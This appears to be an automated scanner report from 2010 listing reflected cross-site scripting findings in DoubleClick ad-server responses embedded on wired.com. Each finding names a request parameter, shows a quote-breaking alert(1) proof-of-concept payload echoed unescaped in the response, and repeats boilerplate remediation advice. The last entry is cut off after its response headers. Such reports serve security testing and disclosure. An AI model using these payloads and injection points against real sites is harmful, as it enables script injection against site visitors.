The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c336"-alert(1)-"521d37aa33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6909
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI& ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca204"-alert(1)-"a9f792ba15b was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... =2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a69"-alert(1)-"0a05ff2bab1 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH& ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a4d"-alert(1)-"84edf4b2caa was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/x%3B231241976%3B0-0%3B0%3B55844876%3B4307-300/250%3B38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdo ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3334"-alert(1)-"8bb98f76d2b was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eed4"-alert(1)-"ce7690ba46a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppa ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38d85"-alert(1)-"ea05c790aae was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:13:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350a3"-alert(1)-"017b84a1884 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... click%3Bh%3Dv8/3a5a/17/16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8abfc"-alert(1)-"81641716a0d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ce02"-alert(1)-"2612c838241 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fsc ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49e73"-alert(1)-"58a8d0f3679 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e74"-alert(1)-"23471b4e672 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 4900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http:// ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d10"-alert(1)-"bac537ef45c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... og.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deb80"-alert(1)-"57c164cc6fa was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6808 Cache-Control: no-cache Pragma: no-cache Date: Mon, 22 Nov 2010 00:13:24 GMT Expires: Mon, 22 Nov 2010 00:13:24 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fahttp://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34fd"-alert(1)-"bc95ae28570 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... ick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222. ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec90"-alert(1)-"2a0e5843a31 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... h%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c30a"-alert(1)-"784b7949c15 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11 ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 720cf"-alert(1)-"0b86199db39 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... bleclick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bef2"-alert(1)-"ffd927cd787 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4a7c"-alert(1)-"431c9d2872f was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee6"-alert(1)-"81ed37232b7 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:15 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 562b5"-alert(1)-"2c378b10046 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
